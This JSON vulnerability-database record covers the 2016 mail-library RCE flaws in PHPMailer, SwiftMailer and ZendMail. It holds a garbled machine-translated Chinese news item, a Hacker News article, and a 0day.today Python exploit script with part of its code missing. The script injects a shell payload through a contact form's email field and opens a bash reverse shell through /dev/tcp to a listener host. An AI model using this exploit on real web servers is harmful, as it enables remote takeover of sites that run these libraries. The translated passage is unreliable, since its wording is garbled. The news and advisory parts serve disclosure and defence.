high-risk(Critical) to. \nSwiftMailer remote command execution vulnerability, CVE-2016-10074\uff09 \nSwiftMailer is also a section with many users of the software, it can be through the SMTP Protocol to send mail. Many open source projects use this library, including Yii2, Laravel,Symfony is. \nSwiftMailer vulnerability using the method of the PHPMailer vulnerability similar, just find the use of the SwiftMailer page, such as registration, contact forms, password resets, etc. the page will be able to execute the command. \nHackers can be in the[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)on the remote execution command, so that the storming of the server. \nSwiftMailer all versions affected by this vulnerability, including the most recent 5. 4. 5-DEV version. \nGolunski to the SwiftMailer team reported this vulnerability, the development team quickly fixed the vulnerability within a day released a 5. 4. 
5 Edition. \nThe \u201cmail transmission function(Swift_Transport_MailTransport)vulnerability exists, if the\u201dFrom\u201dAnd\u201dReturnPath\u201dor\u201dSender\u201dheader from an untrusted source, the function may be transmitted to any of the shell parameters, which leads to remote code execution.\u201d SwiftMailer updates log writes. \nZendMail RCE Vulnerability CVE-2016-10034\uff09 \nZendMail is Zend Framework a PHP component Zend Framework has 9500 million installed capacity. \n! [](/Article/UploadPic/2017-1/20171543510857. png? www. myhack58. com) \n\nZendMail using the method with PHPMailer And SwiftMailer similar, on the address insert quotation marks. Because the program is not successful the filter, causing the input value is treated as a parameter to execute. \nGolunski has released a PoC video demo and a named PwnScriptum the triple exp, which contains three vulnerabilities attack method. And will soon publish a white paper to explain in detail the three vulnerabilities. \n\n", "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/82688.htm", "id": "MYHACK58:62201782688", "type": "myhack58", "title": "PhpMailer and SwiftMailer, the ZendMail successive exposure of the RCE high-risk vulnerabilities, affecting millions of Web servers-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:18:19", "bulletinFamily": "info", "description": "[](<https://2.bp.blogspot.com/-2Z4IlyWvnVA/WGuAA0XIxDI/AAAAAAAAq18/h4xhtaXJX8sW4Ob1B4LdqYSAc4sXo198wCLcB/s1600/phpmailer-swiftmailer-zendmail.png>)\n\nA security researcher recently reported a [critical vulnerability](<https://thehackernews.com/2016/12/phpmailer-security.html>) in one of the most popular open source PHP libraries used to send emails that allowed a remote attacker to execute arbitrary code in the context of the web server and compromise a web application. 
\n \nDisclosed by Polish security researcher [Dawid Golunski](<https://twitter.com/dawid_golunski>) of Legal Hackers, the issue ([CVE-2016-10033](<https://thehackernews.com/2016/12/phpmailer-security.html>)) in PHPMailer used by more than 9 Million users worldwide was thought to be fixed with the release of version 5.2.18. \n \nHowever, Golunski managed to bypass the patched version of PHPMailer that was given a new CVE ([CVE-2016-10045](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html>)), which once again put millions of websites and popular open source web apps, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla, at risk of remote code execution attack. \n \nPHPMailer eventually fixed the issue with an update, [version 5.2.20](<https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md>). All versions of PHPMailer before this critical release are affected, so web administrators and developers are strongly recommended to update to the new version. \n \nIn addition to this bug, Golunski also reported a similar vulnerability in two other mailing libraries for PHP, [SwiftMailer](<https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html>), and [ZendMail](<https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html>), that could have also led to remote code execution attack. \n \n\n\n### RCE Flaw in SwiftMailer\n\n \nSwiftMailer is also a popular PHP library used by many major open-source projects, including top PHP programming frameworks like Yii2, Laravel, Symfony for sending emails over SMTP. 
\n \nThe vulnerability (CVE-2016-10074) in SwiftMailer can be exploited in the same manner as the [PHPMailer vulnerability](<https://thehackernews.com/2016/12/phpmailer-security.html>) by targeting web site components that use SwiftMailer class, such as contact/registration forms, password email reset forms, and so forth. \n \nAttackers can execute arbitrary code remotely in the context of the web server, which could further be exploited to access a web server hosting a web application that used a vulnerable version of the library. \n \nThe SwiftMailer vulnerability affects all versions of the library, including the then-current release, version 5.4.5-DEV. \n \nGolunski disclosed the vulnerability to SwiftMailer team, and developers acted fast to fix the issue, rolling out patched version 5.4.5 within a day. \n \n\"The mail transport (Swift_Transport_MailTransport) was vulnerable to passing arbitrary shell arguments if the \"From,\" \"ReturnPath\" or \"Sender\" header came from a non-trusted source, potentially allowing Remote Code Execution,\" reads the changelog for SwiftMailer on [GitHub](<https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGES>). \n \n\n\n### RCE Flaw in ZendMail\n\n[](<https://4.bp.blogspot.com/-Ii-1BPjXwCc/WGt59QirE8I/AAAAAAAAq1s/oYWKumzDrhUmFFOxMrBkA_gNJw7WTbZagCLcB/s1600/zendmail-exploit.png>)\n\nZendMail is a component of a very popular PHP programming framework Zend Framework with more than 95 Million installations. \n \nThe critical vulnerability (CVE-2016-10034) in ZendMail can also be exploited in the same manner as one discovered in PHPMailer and SwiftMailer by targeting web site components that use ZendMail, like contact/registration forms, password email reset forms, and so on. \n \nAttackers could achieve remote code execution in the context of the web server and could remotely compromise the target web application that used the vulnerable version of the ZendMail. 
\n \nThe researcher reported the issue to ZendMail, and the developers fixed the vulnerability and rolled out the patched version. \n\n\n> \"When using the zend-mail component to send email via the Zend\\Mail\\Transport\\Sendmail transport, a malicious user may be able to inject arbitrary parameters to the system sendmail program,\" ZendMail wrote in a [blog post](<https://framework.zend.com/security/advisory/ZF2016-04>).\n\n> \"The attack is performed by providing additional quote characters within an address; when unsanitized, they can be interpreted as additional command line arguments, leading to the vulnerability.\"\n\nGolunski has released a proof-of-concept video demonstration that will show all the three attacks in action. \n\n\nGolunski has also released a 3-in-1 exploit, nicknamed [PwnScriptum](<https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py>), about the vulnerabilities in PHPMailer, SwiftMailer, and ZendMail. \n \nThe researcher will soon be revealing a security [white-paper](<https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html>) with previously unknown exploitation vectors and techniques that can be used to exploit all the 3 vulnerabilities.\n", "modified": "2017-01-05T07:21:09", "published": "2017-01-02T23:45:00", "id": "THN:BD003AAB715C2448BF92B78197DE160C", "href": "https://thehackernews.com/2017/01/phpmailer-swiftmailer-zendmail.html", "type": "thn", "title": "Critical Updates \u2014 RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-06T21:09:00", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-06-22T00:00:00", "published": "2017-06-22T00:00:00", "href": "https://0day.today/exploit/description/28005", "id": "1337DAY-ID-28005", "title": "PHPMailer < 
5.2.20 with Exim MTA - Remote Code Execution Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n#\r\n# Exploit Title: [RCE for PHPMailer < 5.2.20 with Exim MTA]\r\n# Date: [16/06/2017]\r\n# Exploit Author: [@phackt_ul]\r\n# Software Link: [https://github.com/PHPMailer/PHPMailer]\r\n# Version: [< 5.2.20]\r\n# Tested on: [Debian x86/x64]\r\n# CVE : [CVE-2016-10033,CVE-2016-10074,CVE-2016-10034,CVE-2016-10045]\r\n#\r\n# @phackt_ul - https://phackt.com\r\n#\r\n# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com\r\n# and its research on PHP libraries vulns\r\n#\r\n# PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\n# PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\r\n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n#\r\n# ExploitBox project:\r\n# https://ExploitBox.io\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n# https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n# http://pwnscriptum.com/\r\n#\r\n# --------------------------------------------------------\r\n# Enhanced for Exim MTA\r\n# \r\n# N.B: \r\n# The original author's method in the PHPMailer POC (for sendmail MTA) uses the RFC 3696 \r\n# double quotes technique associated with the -oQ -X options to log mailer traffic and to create \r\n# the backdoor. This technique is not facing some payload size issues because the payload \r\n# was in the email body.\r\n#\r\n# For Exim:\r\n# The original author's Wordpress 4.6 POC for Exim combines the comment syntax (RFC 822)\r\n# and the Exim expansion mode techniques. The use of substr on spool_directory and tod_log \r\n# expansion variables in order to bypass the PHP mail() escaping may leads to large \r\n# email addresses payloads. 
However, the comment-syntax validateAddress() technique, which does not \r\n# face any size limitation, cannot be applied to PHPMailer < 5.2.20.\r\n#\r\n# Goal:\r\n# The double-quotes validateAddress() technique (and its patch bypass for PHPMailer < 5.2.20), \r\n# combined with the Exim expansion mode technique, may lead to large payloads that quickly hit the address\r\n# size limit here (260 chars) and so fail to match the pcre8 regexp in the validateAddress() function.\r\n# We therefore base64-encode the command, which bypasses escapeshellcmd() and allows larger payloads.\r\n# \r\n#\r\n# Usage:\r\n# ./rce_phpmailer_exim4.py -url http://victim/phpmailer/ -cf contact_form.php -ip 192.168.1.109 -p 1337\r\n#\r\n# NOTE: the reverse-shell command (cmd) defined below hard-codes 192.168.1.19:1337 and ignores the\r\n# -ip / -p arguments (they are only printed); edit cmd to point at your listener before running.\r\n
Got the '%s' error when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % err.reason\r\n exit(4)\r\n \r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')\r\nparser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default=\"8888\")\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n \r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n \r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nATTACKER_IP = [%s]\r\nATTACKER_PORT = [%s]\r\nPOST_ACTION = [%s]\r\nPOST_NAME = [%s]\r\nPOST_EMAIL = [%s]\r\nPOST_MSG = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)\r\n \r\n# Ask for mail library\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution 
(CVE-2016-10033)\"\"\"\r\nprint \"\"\" SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\"\"\"\r\nprint \"\"\" Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\"\"\"\r\nprint \"\\033[0m\"\r\n \r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\n \r\nif (target>2):\r\n print \"No such target. Exiting\\n\"\r\n exit(3)\r\n \r\n################################\r\n# Payload\r\n################################\r\ncmd = \"/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'\"\r\nprepared_cmd = prepare_cmd(cmd)\r\n \r\npayload = '\"a\\\\\" -be ' + prepared_cmd + ' \"@a.co'\r\n \r\n# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)\r\nif target == 2:\r\n payload = \"\\\"a\\\\' -be \" + prepared_cmd + \" \\\"@a.co\"\r\n \r\n################################\r\n# Attack episode\r\n# This step will execute the reverse shell\r\n################################\r\n \r\n# Form fields\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: 'Really important message'}\r\n \r\n# Print relevant information\r\nprint \"\\n[+] Executing command on victim server\\n\"\r\nprint '[!] command: [%s]' % cmd\r\nprint '[!] payload: [%s]' % payload\r\nprint '[!] post_fields: [%s]\\n' % str(post_fields)\r\n \r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nsend_request(req)\r\n \r\nprint \"\\033[1;32m[+] You should check your listener and cross the fingers ;)\\033[0m\\n\"\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28005"}]}